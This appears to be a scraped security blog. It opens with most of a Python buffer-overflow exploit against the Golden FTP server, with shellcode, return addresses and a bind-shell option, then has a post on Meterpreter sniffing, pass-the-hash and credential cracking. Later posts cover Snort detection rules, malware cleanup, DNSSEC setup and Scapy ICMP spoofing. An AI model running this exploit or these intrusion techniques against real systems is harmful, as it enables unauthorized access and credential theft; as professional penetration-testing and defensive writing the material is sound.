<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x95\xd3\x01\x41\x09\x36\x93\x41\xaa\xb5\x84\xd9\x35\xb0" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x44\x13\xc0\x38\x6b\xab\x1a\x8c\xb7\xec\x30\x7a\x4a\x73" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xe5\xf1\x7e\x7e\xaf\x66\xa1\x85\x53\xea\x1a\xd7\x0b\x9a" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x9e\xf0\x04\x63\xe0\x57\xf6\x6a\x88\xb1\xef\xe0\x4a\x78" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x63\xdb\xcf\xe6\xde\xcf\xe9\x2c\x94\x5f\xef\x28\x2a\xdc" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xcd\x7a\xb2\x13\x88\xb1\x8d\x40\xcf\x0c\xf9\x52\x2f\xbc" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xd4\x34\xad\xb0\x45\xfb\xe2\xa3\xab\xa7\x46\xf6\x83\x38" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xe0\x36\x75\x7a\x6f\x96\xb3\x4f\xbe\xb9\x17\xbd\xea\x0e" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xf9\x10\x62\x2e\x91\x69\x28\xeb\xe6\x07\x23\x0f\xf6\x26" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x4a\xec\xba\xd8\x74\xba\xe6\x38\xb3\x56\x13\xf1\x8d\x70" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x98\xc9\x60\xcf\x9c\xf5\x1f\x8f\x8f\x04\x6c\x61\x63\x25" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x87\x89\x1d\x58\x4f\x18\xca\xcb\x11\x03\x24\x6b\xa6\xbd" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x47\x90\x43\xc5\x9f\x3f\xc8\x64\x3a\xcc\x69\xc7\x9c\x2d" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x19\xc1\x67\xfa\x07\xcb\xd7\x92\x83\x23\x50\xdf\xa2\xd8" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x08\xa8\xec\x43\xbb\xda\x10\xc2\x0b\x30\xb7\xdd\xbd\x33" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x6a\x18\x98\x1e\xc1\x5e\x77\xeb\xe8\x21\x4e\x18\x60\x6f" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x60\x5c\x99\xb6\x7e\x28\xdb\xda\x40\xea\x8c\xc7\x5c\x70" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x7f\xd1\x61\xaf\x42\x25\x8d\xec\xb9\xde\x5f\x40\xa2\xa2" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xe2\x39\x6f\x85\x54\xd3\xa0\xef\x4c\x08\x23\xb5\x88\x85" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xc0\xfc\xd2\x50\x68\x5b\x93\x33\x8a\x6e\xf8\x4d\x79\xa8" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x29\x56\x39\xee\x4f\xd2\x49\x48\x4e\x0e\x1c\x8a\xd5\xa6" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xd0\x94\xfb\xda\x22\x3d\xf4\x22\xe7\x54\xff\xa2\x05\xc4" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x8c\xc7"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if len(sys.argv) < 5:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> print "[-]Usage: %s <src addr> <target addr> <shellcode> <platform>" % sys.argv[0]</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> print "\tshellcode = (calc|shell)"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> print "\tplatform = (sp0|sp2|sp3)"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> print "\tExample: ./gftp-sploit.py 1.2.1.2 5.6.5.4 calc sp2"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> sys.exit(0)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">srcaddr = sys.argv[1]</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">target = sys.argv[2]</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">shellcode = sys.argv[3]</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">platform = sys.argv[4]</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># which payload?</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">buf = calc</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if shellcode == "calc":</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> buf = calc</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">elif shellcode == "shell":</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> buf = cmdshell</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># address of JMP ESI in Kernel32.dll</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if platform == "sp0":</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> jmpesi = "\x7b\x15\xe8\x77"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">elif platform == "sp2":</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> jmpesi = "\xc3\x72\x85\x7c"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">elif platform == "sp3":</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> jmpesi = "\x0b\xda\x82\x7c"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">shortjmp = "\x90\x90\x90\x90\xeb\x20\n"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">nopsled = "\x90" * 60</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">padding = "A" * (533 - len(srcaddr + buf + nopsled))</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">payload = nopsled + buf + padding + jmpesi</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">print "\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[+] Golden FTP PASS Exploit\n\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[+] Version 2.5, July 8 2011\n\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[+] Author: Joff Thyer (jsthyer@gmail.com)\n\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[+] 'Show new connections' must be enabled in GoldenFTP in order\n\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[+] for this exploit to succeed!\n\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[+] Connecting: "+target</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">try:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> s.connect((target,21))</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">except:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> print "[-] Connection to "+target+" failed!"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> sys.exit(0)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">print "[+] Sending payload, length = " + `len(payload)`</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">s.send(shortjmp);</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">s.send("USER anonymous\n")</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">s.send("PASS " + payload + "\n")</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">s.recv(1024)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">print "[+] Sleeping 2 secs..."</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">time.sleep(2)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">s.close()</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if shellcode == "shell" and srcaddr == target:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> p = Popen(["netstat","-na"],stdout=PIPE,shell=False)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> netstat = p.stdout.read()</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> shellok = re.search("TCP\s*0\.0\.0\.0:4444.*LISTENING",netstat)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> if shellok:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> print "[+] "+shellok.group(0)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">print "[+] Done."</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">sys.exit(0)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2320276621879394553.post-6366903517394053572011-06-02T10:51:00.000-07:002011-06-02T10:51:30.308-07:00Using CAIN to read packet captures during a Penetration TestThere are many ways to leverage transitive trust relationships in an environment when performing penetration testing. Once privileged access is obtained on a single Windows system, password hashes can usually be dumped, and it is often the case that credentials are shared across systems. In an environment that only uses LANMAN/NTLMv1 challenge/response and fixed stored hashes, access to other Windows systems can be obtained with possession of the stored hash alone.<br />
<br />
Within the Metasploit framework there exists the 'windows/smb/psexec' module, which works in a similar fashion to the Microsoft Sysinternals PSEXEC command but can also "pass the hash" by setting the SMBPass variable to a LANMAN:NT hash rather than a plaintext password. This is a useful way to pivot to other systems once a single set of hashes is obtained.<br />
<br />
A feature of the Metasploit Meterpreter I found useful in a recent Penetration Test is the 'sniffer' module. This module will allow you to capture up to 50,000 packets from an exploited system and download the captured data to a libpcap compatible file.<br />
<br />
meterpreter > use sniffer<br />
Loading extension sniffer...success.<br />
meterpreter > sniffer_interfaces<br />
<br />
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )<br />
2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )<br />
<br />
meterpreter > sniffer_start 2<br />
[*] Capture started on interface 2 (50000 packet buffer)<br />
meterpreter > sniffer_stats 2<br />
[*] Capture statistics for interface 2<br />
packets: 1849<br />
bytes: 444042<br />
<br />
meterpreter > sniffer_dump 2 myfile.pcap<br />
meterpreter > sniffer_stop 2<br />
<br />
<br />
During a recent Pen Test, I happened to gain access to a network monitoring system. This is the near perfect scenario to leverage the meterpreter sniffer module.<br />
<br />
CAIN (www.oxid.it) is most often thought of as a layer 2 network interception and man-in-the-middle tool with an incredibly useful set of password hash analysis and cracking abilities. CAIN has the ability to perform cryptanalysis using traditional rcrack style rainbow tables as well as the ophcrack format rainbow tables. Password cracking can also be done in dictionary or brute force mode.<br />
<br />
What is usually overlooked is that CAIN can read libpcap files and process their contents, parsing out the various application and OS password hash formats it understands. Performing this libpcap file parsing in CAIN is a simple click on the open-folder icon at the top left of the menu bar. It is hard to find because the typical "open file" entry does not exist in the file menu.<br />
<br />
I used this capability to parse through sniffer packet captures from compromised systems, and managed to further my intrusion into the environment significantly in the process. Cryptanalysis, dictionary and brute force attacks can be leveraged against captured LANMAN/NT challenge response transactions. Dictionary and brute force attacks can be used against Oracle and MySQL database credentials, which are often weak. SNMP version 1 community strings are obviously plaintext and easy to capture. In older versions, MSSQL used TDS password obfuscation (Unicode XORed with 0xa5), which is easily reversible. It is also quite interesting to see how much plaintext LDAP can be leveraged for access.<br />
<br />
Within the Pen Testing context, obtaining access and obtaining passwords with associated cracking time is a huge component. However, we cannot forget that demonstrating access to real data is important to show there exists real risk.<br />
<br />
I find that the most interesting demonstration of this is to show that you can access database tables. However, one must tread carefully in this area. When demonstrating this access, try showing some table names, some column names and such without actually pulling database rows themselves. The idea is to prove that you own it and are there, without putting sensitive data into your reports. Redacted screenshots can work well in this context also.<br />
<br />
With regard to database client software, the most challenging area is to get a functional Oracle PL*SQL client working. The installation is a little tricky but if you have access to a handy and friendly DBA, you can be up and running pretty quickly. <br />
<br />
Microsoft SQL servers often have the command line utility named OSQL.EXE actually on the server itself, and PWDUMPX is useful for pulling LSA secrets from the Windows registry which often contain database credentials.<br />
<br />
The MySQL command line client is a simple installation, especially on Linux distros like Ubuntu, so that should not present much of a challenge.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2320276621879394553.post-74751947732143010302011-04-11T06:42:00.000-07:002011-04-11T07:12:35.431-07:00Windows XP Startup/Logon Process and MalwareRecently I had to rescue my daughter's PC from some nasty malware. For many security professionals, troubleshooting family systems is a common weekend / after hours challenge, and a lot of us are not in the business of desktop remediation.<br />
<br />
I find that the ISO based whole system virus scanners are not a bad starting point to get rid of the low hanging fruit. I have used F-Secure, and Kaspersky among others.<br />
<br />
I also find that after the scanning/remediation process, XP registry entries are often still broken, leaving a lot of people at the point of just re-installing. Of course, re-installing is sometimes the only option for deeply embedded malware and/or rootkits.<br />
<br />
A tool I found useful when I was poking through the HKEY_USERS registry hive was 'USER2SID', since those registry entries are keyed by the SID. I also found that the malware I was dealing with had re-written the 'exefile' and '.exe' shell keys to point at its own EXE file, which was somewhat frustrating once that malware EXE file was finally gone (i.e. Windows kept asking which program to open an .exe with!).<br />
<br />
Also, age old advice is to remember those program startup registry keys which are often used to infect/re-infect things:<br />
<br />
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce<br />
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run<br />
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run<br />
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run<br />
HKCU\Software\Microsoft\Windows\CurrentVersion\Run<br />
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce<br />
%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup<br />
%systemdrive%\Documents and Settings\username\Start Menu\Programs\Startup<br />
%windir%\Profiles\All Users\Start Menu\Programs\Startup<br />
%windir%\Profiles\username\Start Menu\Programs\Startup<br />
<br />
<br />
Don't forget about our old SysInternals tools, particularly 'AutoRuns' and 'Process Explorer' which I continue to find extremely useful.<br />
<br />
The Windows utility SFC.EXE is useful for a diff scan of critical system files as long as it has not been compromised.<br />
<br />
*** Always use READ-ONLY media when in a desktop incident response situation like this otherwise anything goes with regard to what is written to your favorite USB memory stick!Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2320276621879394553.post-43212691719416958262011-04-11T06:27:00.000-07:002011-04-11T06:27:04.549-07:00Detecting PECOFF EXE/DLL files with SnortSome time ago, I became interested in parsing the PECOFF file format. As a result, I authored several different Snort rules to detect the transfer of either an EXE or DLL file of different varieties. Listed below are rules for both i386/32-bit and x86-64-bit. Additionally, there is a set of rules for UPX Packed EXE files.<br />
<br />
Hopefully readers and Snort fans will find these useful.<br />
<br />
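Before the rules themselves, here is the header logic they encode, written out as an added Python example (not part of the original post and not Snort code): it applies the same DOS header, COFF Machine, Characteristics DLL bit, optional header Magic and Win32VersionValue checks to a byte buffer, and builds constructed header-only images to exercise them. Two caveats for rule writers: the x86-64 machine type is 0x8664, which appears on the wire as the bytes 64 86 right after the PE signature, and the leading MZ 90 00 pattern assumes the usual linker DOS stub (e_cblp = 0x90), which not every toolchain emits.<br />

```python
import struct

# PE/COFF header constants behind the byte patterns in the rules below.
IMAGE_FILE_MACHINE_I386 = 0x014C    # COFF Machine, on the wire "|4C 01|" right after "PE\0\0"
IMAGE_FILE_MACHINE_AMD64 = 0x8664   # COFF Machine for x86-64, on the wire "|64 86|"
IMAGE_FILE_DLL = 0x2000             # Characteristics bit tested by byte_test:2,&,0x2000
PE32_MAGIC = 0x10B                  # optional header Magic "|0B 01|"
PE32PLUS_MAGIC = 0x20B              # optional header Magic "|0B 02|"
PE_SIGNATURE = b"PE\x00\x00"


def classify_pe(data):
    """Apply the header checks the rules encode; return (arch, kind) or None."""
    # content:"|4D 5A 90 00|"; depth:512 -> DOS header must start within the first 512 bytes
    mz = data.find(b"MZ\x90\x00", 0, 512)
    if mz < 0 or len(data) < mz + 64:
        return None
    # byte_jump:4,56,relative,little -> e_lfanew, the PE header offset stored at DOS+0x3c
    e_lfanew, = struct.unpack_from("<I", data, mz + 0x3C)
    pe = mz + e_lfanew
    # need the 4-byte signature, the 20-byte COFF header and the optional header up to +56
    if len(data) < pe + 80 or data[pe:pe + 4] != PE_SIGNATURE:
        return None
    machine, = struct.unpack_from("<H", data, pe + 4)            # "|4C 01|" or "|64 86|"
    characteristics, = struct.unpack_from("<H", data, pe + 22)   # byte_test ... 16,relative
    magic, = struct.unpack_from("<H", data, pe + 24)             # "|0B 01|"/"|0B 02|" distance:18
    win32_version, = struct.unpack_from("<I", data, pe + 76)     # "|00 00 00 00|" distance:50
    if win32_version != 0:          # Win32VersionValue is reserved and must be zero
        return None
    if machine == IMAGE_FILE_MACHINE_I386 and magic == PE32_MAGIC:
        arch = "i386 PE32"
    elif machine == IMAGE_FILE_MACHINE_AMD64 and magic == PE32PLUS_MAGIC:
        arch = "x86-64 PE32+"
    else:
        return None
    return arch, ("DLL" if characteristics & IMAGE_FILE_DLL else "EXE")


def build_minimal_pe(machine, magic, characteristics, e_lfanew=0x80):
    """Constructed test image: valid headers only, no sections or code (not a runnable binary)."""
    dos = bytearray(64)
    dos[0:4] = b"MZ\x90\x00"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    stub = bytes(e_lfanew - 64)                        # zero-filled DOS stub area
    opt_size = 0xE0 if magic == PE32_MAGIC else 0xF0   # PE32 / PE32+ optional header sizes
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)              # Win32VersionValue at +52 stays zero
    return bytes(dos) + stub + PE_SIGNATURE + coff + bytes(opt)


if __name__ == "__main__":
    for mach, mag, chars in ((IMAGE_FILE_MACHINE_I386, PE32_MAGIC, 0x0102),
                             (IMAGE_FILE_MACHINE_I386, PE32_MAGIC, 0x2102),
                             (IMAGE_FILE_MACHINE_AMD64, PE32PLUS_MAGIC, 0x0022),
                             (IMAGE_FILE_MACHINE_AMD64, PE32PLUS_MAGIC, 0x2022)):
        print(classify_pe(build_minimal_pe(mach, mag, chars)))
```
<br />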
# i386 32-bit EXE over TCP<br />
log tcp any any -> any any (msg:"LOCAL: i386 PE32 EXE File Xfer"; flowbits:isnotset,upx.exe.packed; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; flowbits:unset,upx.exe.packed; sid:4963001; rev:1;)<br />
<br />
# i386 32-bit DLL over TCP<br />
alert tcp any any -> any any (msg:"LOCAL: i386 PE32 DLL File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963002; rev:1;)<br />
<br />
# x86 64-bit EXE over TCP<br />
alert tcp any any -> any any (msg:"LOCAL: x86 PE32+ EXE File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||64 86|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 02|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963101; rev:1;)<br />
<br />
# x86 64-bit DLL over TCP<br />
alert tcp any any -> any any (msg:"LOCAL: x86 PE32+ DLL File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||64 86|"; byte_test:2,&,0x2000,16,relative,little; content:"|0B 02|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963102; rev:1;)<br />
<br />
# UPX Packed EXE over TCP<br />
alert tcp any any -> any any (msg:"LOCAL: i386 PE32 UPX Packed EXE File Xfer over TCP"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; content:"UPX0"; within:172; content:"|00 04 00 00|"; distance:16; within:4; content:"|80 00 00 E0|"; distance:12; within:4; flowbits:set,upx.exe.packed; sid:4963201; rev:1;)<br />
<br />
# UPX Packed EXE over UDP<br />
alert udp any any -> any any (msg:"LOCAL: i386 PE32 UPX Packed EXE File Xfer over UDP"; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; content:"UPX0"; within:172; content:"|00 04 00 00|"; distance:16; within:4; content:"|80 00 00 E0|"; distance:12; within:4; flowbits:set,upx.exe.packed; sid:4963301; rev:1;)Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2320276621879394553.post-28615112659590619242010-11-10T08:32:00.000-08:002010-11-10T08:32:03.453-08:00DNSSEC NotesQuick and dirty DNSSEC recipe:<br />
<br />
1) named.conf global options<br />
<br />
options {<br />
dnssec-enable yes;<br />
dnssec-validation yes;<br />
};<br />
<br />
1.5) "root" zone trusted key<br />
<br />
get root key: <br />
dig +multi +noall +answer DNSKEY . >root.dnskey<br />
<br />
convert to DS RR set:<br />
dnssec-dsfromkey -f root.dnskey . >root.ds<br />
<br />
include in named.conf:<br />
<br />
managed-keys {<br />
"." initial-key 257 3 8 "<br />
blah blah blah ";<br />
};<br />
<br />
2) Generating key signing key (KSK) and zone signing key (ZSK)<br />
<br />
ZSK: dnssec-keygen -r /dev/random -a RSASHA1 -b 1024 -n ZONE myzone.name<br />
KSK: dnssec-keygen -r /dev/random -f KSK -a RSASHA1 -b 1280 -n ZONE myzone.name<br />
<br />
3) Inside your zone file, include the public keys<br />
<br />
$include Kmyzone.name.+005+1234.key ;ZSK<br />
$include Kmyzone.name.+005+4567.key ;KSK<br />
<br />
4) Sign the DNS zone<br />
<br />
dnssec-signzone -r /dev/random -o myzone.name -k Kmyzone.name.+005+4567 myzone.name Kmyzone.name.+005+1234.key<br />
<br />
5) Verify the signed zone records:<br />
<br />
cat myzone.name.signed<br />
<br />
6) Check a query...<br />
<br />
dig +dnssec www.myzone.name A<br />
<br />
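Step 5 only lets you eyeball the signed zone. As an added Python example (not part of the post and not BIND code), here is an audit of a constructed, one-record-per-line excerpt in the style of dnssec-signzone output: it reports RRsets with no RRSIG, signatures that are expired, not yet valid or within a week of expiry, and which key tags sign the DNSKEY RRset (the KSK) versus everything else (the ZSK). The key and signature fields are placeholder base64, the NSEC chain is omitted, and no cryptographic verification is performed.<br />

```python
from datetime import datetime, timedelta, timezone

# Constructed excerpt in the one-record-per-line style of a dnssec-signzone output file.
# Names and key tags follow the post; key and signature data are placeholder base64, not real
# cryptographic material, and the NSEC chain a real signed zone also carries is omitted.
SIGNED_ZONE = """\
myzone.name.     3600 IN SOA    ns1.myzone.name. hostmaster.myzone.name. 2010111001 7200 3600 1209600 3600
myzone.name.     3600 IN RRSIG  SOA 5 2 3600 20101210000000 20101110000000 1234 myzone.name. cGxhY2Vob2xkZXI=
myzone.name.     3600 IN NS     ns1.myzone.name.
myzone.name.     3600 IN RRSIG  NS 5 2 3600 20101210000000 20101110000000 1234 myzone.name. cGxhY2Vob2xkZXI=
myzone.name.     3600 IN DNSKEY 256 3 5 cGxhY2Vob2xkZXI= ; ZSK
myzone.name.     3600 IN DNSKEY 257 3 5 cGxhY2Vob2xkZXI= ; KSK
myzone.name.     3600 IN RRSIG  DNSKEY 5 2 3600 20101210000000 20101110000000 4567 myzone.name. cGxhY2Vob2xkZXI=
www.myzone.name. 3600 IN A      192.0.2.10
www.myzone.name. 3600 IN RRSIG  A 5 3 3600 20101210000000 20101110000000 1234 myzone.name. cGxhY2Vob2xkZXI=
ns1.myzone.name. 3600 IN A      192.0.2.1
"""


def parse_records(zone_text):
    """Split presentation-format lines into (owner, ttl, class, type, rdata fields)."""
    records = []
    for line in zone_text.splitlines():
        line = line.split(";", 1)[0].strip()     # drop trailing comments such as ; ZSK
        if not line:
            continue
        owner, ttl, rclass, rtype, *rdata = line.split()
        records.append((owner, int(ttl), rclass, rtype, rdata))
    return records


def _sigtime(field):
    """RRSIG inception/expiration fields are YYYYMMDDHHMMSS in UTC."""
    return datetime.strptime(field, "%Y%m%d%H%M%S").replace(tzinfo=timezone.utc)


def audit_signed_zone(zone_text, now, warn_days=7):
    """Report coverage and validity of the RRSIGs in a signed zone; 'now' is YYYYMMDDHHMMSS."""
    now = _sigtime(now)
    records = parse_records(zone_text)
    rrsets = {(o, t) for o, _, _, t, _ in records if t != "RRSIG"}
    report = {"unsigned": [], "expired": [], "not_yet_valid": [], "expiring_soon": [],
              "ksk_tags": set(), "zsk_tags": set(), "dnskey_flags": []}
    signed = set()
    for owner, _, _, rtype, rdata in records:
        if rtype == "DNSKEY":
            report["dnskey_flags"].append(int(rdata[0]))   # 256 = ZSK, 257 = KSK (SEP bit)
            continue
        if rtype != "RRSIG":
            continue
        covered, keytag = rdata[0], int(rdata[6])
        expiration, inception = _sigtime(rdata[4]), _sigtime(rdata[5])
        signed.add((owner, covered))
        # the DNSKEY RRset is signed by the KSK, every other RRset by the ZSK
        report["ksk_tags" if covered == "DNSKEY" else "zsk_tags"].add(keytag)
        if now > expiration:
            report["expired"].append((owner, covered))
        elif now < inception:
            report["not_yet_valid"].append((owner, covered))
        elif expiration - now < timedelta(days=warn_days):
            report["expiring_soon"].append((owner, covered))
    report["unsigned"] = sorted(rrsets - signed)
    return report


if __name__ == "__main__":
    for key, value in audit_signed_zone(SIGNED_ZONE, "20101115000000").items():
        print("%-14s %s" % (key, value))
```
<br />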
Note: data for which the local name server is authoritative, served from zone files on disk, does not result in trust chain traversal; i.e. it is assumed that if a server can read the zone off disk, then the zone is trusted anyway.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2320276621879394553.post-45940638000107883682010-06-04T12:05:00.000-07:002010-06-10T13:45:41.960-07:00Better spoofing of ICMP host redirect messages with ScapyScapy is a packet crafting tool written in Python that offers very fine-grained OSI layer 2, 3, and 4 control of header fields. Scapy will do some things for you automatically if you don't fill in all of the fields in any specific header. Examples of this might be the IP total length field, IP version number, TCP or UDP length fields, and checksum values.<br />
<br />
Unlike hping, when Scapy is used to send ICMP redirects it does a fine job of correctly calculating all dependent fields and filling in the required checksums so that things happen correctly. For people familiar with software development and detailed packet header information, Scapy is an ideal tool.<br />
<br />
I used an Ubuntu system to test Scapy out for ICMP redirect activity, obtaining it as follows: "sudo apt-get install python-scapy".<br />
<br />
